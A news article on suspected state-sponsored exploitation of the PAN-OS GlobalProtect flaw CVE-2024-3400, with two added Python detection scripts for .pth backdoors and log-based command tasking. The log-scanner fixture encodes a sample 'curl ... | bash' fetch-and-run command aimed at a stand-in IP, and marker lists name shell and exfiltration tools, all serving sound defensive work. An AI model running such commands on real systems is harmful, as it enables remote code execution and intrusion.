
Zero-Day Vulnerability in Palo Alto Networks Firewalls Exploited

Suspected state-sponsored hackers have been exploiting a zero-day vulnerability in Palo Alto Networks firewalls since March 26. The company has issued a warning and expects to release patches on April 14.

At a glance

  • Suspected state-sponsored hackers exploiting zero-day vulnerability in Palo Alto Networks firewalls since March 26
  • Patches for the vulnerability expected to be available on April 14
  • Volexity discovered the zero-day flaw and provided details on the exploitation
  • Threat actors deploying additional payloads to start reverse shells and exfiltrate data
  • US agencies required to apply patches by April 19 to mitigate potential threats

The details

Suspected state-sponsored hackers have been exploiting a zero-day vulnerability in Palo Alto Networks firewalls tracked as CVE-2024-3400 since March 26.

Palo Alto Networks issued a warning that hackers were actively exploiting an unauthenticated remote code execution vulnerability in its PAN-OS firewall software.

Patches for the vulnerability are expected to be available on April 14.

Volexity Discovery

Volexity, a cybersecurity firm, discovered the zero-day flaw and provided more details on how hackers exploited the vulnerability.

Volexity tracks the activity under the moniker UTA0218 and assesses it as highly likely that state-sponsored threat actors are conducting the attacks.

The zero-day exploitation was first detected on April 10, 2024, within the GlobalProtect feature of Palo Alto Networks PAN-OS.

The threat actors have been exploiting the CVE-2024-3400 zero-day since at least March 26. One of the installed payloads is a custom implant named ‘Upstyle’ designed specifically for PAN-OS to act as a backdoor.

The backdoor is installed through a Python script that creates a path configuration file at ‘/usr/lib/python3.6/site-packages/system.pth’; that .pth file is itself the Upstyle backdoor. Volexity says the backdoor monitors the web server’s logs and extracts base64-encoded commands from them to execute.
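
How a .pth file turns into a backdoor, and how to audit a site-packages directory for one. This is an added example written for this page; it is not Volexity’s analysis code and not the Upstyle implant. The sample .pth contents, the scratch directory and the marker list in is_suspicious_pth_line are constructed for the demo and are heuristics, not published indicators.

```python
"""Why a .pth file works as a backdoor, and how to audit for one.

Added example for this page; not Volexity's analysis code and not the
Upstyle implant.  CPython's site.py processes every *.pth file in
site-packages when an interpreter starts.  A line is normally a directory
to append to sys.path, but a line that begins with "import " (or
"import<TAB>") is passed to exec(), so it runs arbitrary Python.  That is
why dropping /usr/lib/python3.6/site-packages/system.pth is enough to get
code into every Python process that starts on the box afterwards.
The sample .pth contents and the marker list below are constructed for
the demo; they are heuristics, not published indicators.
"""
import os
import re
import tempfile
from typing import Dict, List

# Mirrors the test site.py applies before exec()'ing a .pth line.
_EXEC_LINE = re.compile(r"^import[ \t]")


def pth_executable_lines(text: str) -> List[str]:
    """Return the lines of a .pth file that the interpreter would exec()."""
    out = []
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line or line.startswith("#"):
            continue  # comments and blanks are ignored by site.py
        if _EXEC_LINE.match(line):
            out.append(line)
    return out


def is_suspicious_pth_line(line: str) -> bool:
    """Flag an executed line that does more than import a plain module.

    Editable installs and tools like virtualenv legitimately ship
    'import foo' or 'import foo; foo.bootstrap()' lines, so a plain
    import is not enough; look for code-loading or shell primitives.
    """
    markers = ("exec(", "eval(", "base64", "os.system", "subprocess",
               "__import__", "socket", "marshal", "compile(")
    return any(m in line for m in markers)


def audit_site_packages(site_dir: str) -> Dict[str, List[str]]:
    """Map each .pth file under site_dir to its suspicious executed lines."""
    findings: Dict[str, List[str]] = {}
    for name in sorted(os.listdir(site_dir)):
        if not name.endswith(".pth"):
            continue
        with open(os.path.join(site_dir, name), encoding="utf-8",
                  errors="replace") as fh:
            bad = [l for l in pth_executable_lines(fh.read())
                   if is_suspicious_pth_line(l)]
        if bad:
            findings[name] = bad
    return findings


# Constructed samples (NOT the real Upstyle code).  The "malicious" one only
# decodes to print('hi'); it is never executed by this script, only audited.
BENIGN_PTH = "/opt/vendor/lib\nimport _virtualenv\n"
MALICIOUS_PTH = "import base64; exec(base64.b64decode('cHJpbnQoJ2hpJyk='))\n"


def demo() -> Dict[str, List[str]]:
    """Write both samples into a scratch 'site-packages' and audit it."""
    with tempfile.TemporaryDirectory() as site_dir:
        with open(os.path.join(site_dir, "vendor.pth"), "w") as fh:
            fh.write(BENIGN_PTH)
        with open(os.path.join(site_dir, "system.pth"), "w") as fh:
            fh.write(MALICIOUS_PTH)
        return audit_site_packages(site_dir)


if __name__ == "__main__":
    for name, lines in demo().items():
        print(f"{name}: {lines}")
```

On a real PAN-OS image the same check is `audit_site_packages("/usr/lib/python3.6/site-packages")`; the mere presence of an unexpected `system.pth` there is worth escalating regardless of what the heuristic says about its contents, since vendor packages do not normally install a file by that name.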

Attack Details

Volexity observed the threat actors deploying additional payloads to start reverse shells, exfiltrate PAN-OS configuration data, remove log files, and deploy the Golang tunneling tool named GOST. In one of the breaches, the attackers pivoted to the internal network to steal sensitive Windows files.

On specific target devices, they also stole Google Chrome and Microsoft Edge files. No other payloads were deployed on those devices.

Volexity describes two methods for determining whether a Palo Alto Networks firewall has been compromised.

Edge network devices have become prime targets for threat actors to steal data and gain initial access to a network.

In related incidents, in March 2023, China-linked hackers were exploiting Fortinet zero-days to install a custom implant on devices.

In April 2023, the US and UK warned that the Russian state-sponsored APT28 hackers were deploying a custom malware named ‘Jaguar Tooth’ on Cisco IOS routers.

In May 2023, a Chinese state-sponsored hacking group was infecting TP-Link routers with custom malware.

Barracuda ESG devices were exploited for seven months to deploy custom malware and steal data.

According to Palo Alto Networks, threat actors have been exploiting a zero-day flaw in PAN-OS since March 26, 2024. The flaw is a command injection vulnerability that lets an unauthenticated attacker execute arbitrary code with root privileges on the firewall.

It affects PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1 firewalls configured with a GlobalProtect gateway and device telemetry enabled. Palo Alto Networks later revised the advisory to state that device telemetry does not need to be enabled for a firewall to be exposed, so disabling telemetry is not a mitigation: any firewall on an affected release that exposes a GlobalProtect gateway or portal should be treated as vulnerable until patched.

The exploitation is tracked under Operation MidnightEclipse by Palo Alto Networks’ Unit 42 division.

Attackers create a cron job that fetches commands from an external server and pipes them to the bash shell.

They manually manage an access control list on the command-and-control server, restricting which hosts can reach it.

The Python-based backdoor used in the attack is the one Volexity tracks as UPSTYLE.

The backdoor writes and launches a second Python script that executes the threat actor’s commands.

The attack chain uses legitimate files on the firewall for both directions of the channel: commands come in, and results go out, through files the firewall’s web server already uses.

The threat actor sends forged network requests so that the command is recorded in the web server’s error log, from which the backdoor reads and runs it. The output is written to a legitimate file that the firewall serves, and the original content is restored after 15 seconds, so the operator must retrieve the results within that window.
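
Detection logic for the request side of that channel, as an added example that is not Volexity’s or Unit 42’s code: because the tasking arrives as a forged request that the web server records, a copy of the log can be searched for long base64 strings that decode to command text. The log layout and every sample line are constructed for the demo; the real PAN-OS log format and the exact marker the implant keys on are not reproduced here, and the shell-marker list is a tunable heuristic.

```python
"""Scan web-server log lines for base64 blobs that decode to shell commands.

Added example for this page, not Volexity's or Unit 42's detection logic.
The backdoor described above takes its tasking from forged HTTP requests
that the firewall's web server records in a log file, so a copy of that
log can be searched for request fragments that are long base64 strings
decoding to command text.  The log layout and every sample line below are
constructed for the demo; the real PAN-OS log format, and the exact marker
the implant keys on, are not reproduced here.
"""
import base64
import binascii
import re
import string
from typing import List, NamedTuple

# Maximal runs of base64 alphabet characters, 16+ long, with optional padding.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Decoded text must contain one of these to be reported; tune per environment.
_SHELL_MARKERS = ("bash", "/bin/sh", "curl ", "wget ", "nc ", "python",
                  "chmod", "crontab", "/tmp/", "|", ";", "&&")

_PRINTABLE = set(string.printable)


class Hit(NamedTuple):
    line_no: int
    token: str
    decoded: str


def try_decode(token: str) -> str:
    """Strictly base64-decode token; return '' unless it is printable ASCII."""
    try:
        raw = base64.b64decode(token, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return ""
    return text if text and set(text) <= _PRINTABLE else ""


def candidates(line: str):
    """Yield base64-looking tokens from a log line.

    '/' is itself a base64 character, so a blob used as the last URL path
    segment is glued to the preceding path; try the whole run first, then
    the part after the final '/'.
    """
    for run in _B64_RUN.findall(line):
        yield run
        if "/" in run:
            yield run.rsplit("/", 1)[1]


def scan_log(lines: List[str]) -> List[Hit]:
    """Return every (line number, token, decoded text) that looks like tasking."""
    hits: List[Hit] = []
    for n, line in enumerate(lines, 1):
        seen = set()
        for token in candidates(line):
            if token in seen:
                continue
            seen.add(token)
            decoded = try_decode(token)
            if decoded and any(m in decoded for m in _SHELL_MARKERS):
                hits.append(Hit(n, token, decoded))
    return hits


# Constructed sample log lines (not real PAN-OS output).
SAMPLE_LOG = [
    # benign: a probe for a missing file
    '2024/04/10 12:00:01 [error] 1234#0: *1 open() "/global-protect/portal/favicon.ico" '
    'failed (2: No such file or directory), client: 198.51.100.7',
    # benign but base64-shaped: an opaque id that decodes to binary, must not be reported
    '2024/04/10 12:00:02 [error] 1234#0: *2 invalid session AAECAwQFBgcICQoLDA0ODxAREhMUFRYX, '
    'client: 198.51.100.7',
    # malicious: the forged request's last path segment decodes to a shell command
    '2024/04/10 12:00:03 [error] 1234#0: *3 open() '
    '"/global-protect/Y3VybCAtcyBodHRwOi8vMjAzLjAuMTEzLjkveCB8IGJhc2g=" '
    'failed (2: No such file or directory), client: 203.0.113.9',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit.line_no}: {hit.decoded!r}")
```

The log is the more durable artefact here: the result file is restored within 15 seconds, so a periodic integrity scan of served files will usually miss the channel, whereas the forged request stays in the log until it is rotated or the attacker deletes it (log removal is one of the actions Volexity observed).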

The threat actor has been observed creating a reverse shell, downloading additional tools, and exfiltrating data.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the flaw to its Known Exploited Vulnerabilities catalog.

Federal agencies are required to apply patches by April 19 to mitigate potential threats.

Palo Alto Networks is expected to release fixes for the flaw by April 14.

Volexity suggests that the threat actor UTA0218 is state-backed based on the resources and capabilities displayed.

Article X-ray

Facts attribution

This section links each of the article’s facts back to its original source.

If you suspect false information in the article, you can use this section to investigate where it came from.

bleepingcomputer.com
– Suspected state-sponsored hackers have been exploiting a zero-day vulnerability in Palo Alto Networks firewalls tracked as CVE-2024-3400 since March 26
– Palo Alto Networks warned that hackers were actively exploiting an unauthenticated remote code execution vulnerability in its PAN-OS firewall software
– Patches for the vulnerability would be available on April 14
– Volexity discovered the zero-day flaw and provided more details on how hackers exploited the vulnerability
– Volexity is tracking the malicious activity under the moniker UTA0218 and believes it is highly likely that state-sponsored threat actors are conducting the attacks
– Volexity first detected the zero-day exploitation on April 10, 2024, within the GlobalProtect feature of Palo Alto Networks PAN-OS
– The threat actors have been exploiting the CVE-2024-3400 zero-day since at least March 26
– One of the installed payloads is a custom implant named ‘Upstyle’ designed specifically for PAN-OS to act as a backdoor
– The backdoor is installed through a Python script that creates a path configuration file at ‘/usr/lib/python3.6/site-packages/system.pth’
– The system.pth file is the Upstyle backdoor and Volexity says it will monitor the web server’s access logs to extract base64 commands to execute
– Volexity observed the threat actors deploying additional payloads to start reverse shells, exfiltrate PAN-OS configuration data, remove log files, deploy the Golang tunneling tool named GOST
– In one of the breaches, Volexity observed the attackers pivoting to the internal network to steal sensitive Windows files
– The threat actors stole Google Chrome and Microsoft Edge files on specific target’s devices
– No other payloads were deployed on the devices
– Volexity says two methods can be used to detect if a Palo Alto Networks firewall was compromised
– Edge network devices have become prime targets for threat actors to steal data and gain initial access to a network
– In March 2023, China-linked hackers were exploiting Fortinet zero-days to install a custom implant on devices
– In April 2023, the US and UK warned that the Russian state-sponsored APT28 hackers were deploying a custom malware named ‘Jaguar Tooth’ on Cisco IOS routers
– In May 2023, a Chinese state-sponsored hacking group was infecting TP-Link routers with custom malware
– Barracuda ESG devices were exploited for seven months to deploy custom malware and steal data
securityweek.com
– Threat actors have been exploiting a zero-day flaw in Palo Alto Networks PAN-OS software since March 26, 2024
– The flaw is a command injection vulnerability that allows attackers to execute arbitrary code with root privileges
– The vulnerability affects PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewall configurations with GlobalProtect gateway and device telemetry enabled
– The exploitation is tracked under Operation MidnightEclipse by Palo Alto Networks’ Unit 42 division
– The attackers create a cron job to fetch commands from an external server and execute them using the bash shell
– The attackers manually manage an access control list for the command-and-control server
– The Python-based backdoor used in the attack is tracked as UPSTYLE by Volexity
– The backdoor writes and launches another Python script to execute the threat actor’s commands
– The attack chain uses legitimate files associated with the firewall to extract commands and write results
– The threat actor forges network requests to write commands to the web server error log
– The goal is to exfiltrate results within 15 seconds before the file is overwritten
– The threat actor has been observed creating a reverse shell, downloading additional tools, and exfiltrating data
– The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the flaw to its Known Exploited Vulnerabilities catalog
– Federal agencies are required to apply patches by April 19 to mitigate potential threats
– Palo Alto Networks is expected to release fixes for the flaw by April 14
– Volexity suggests that the threat actor UTA0218 is state-backed based on the resources and capabilities displayed
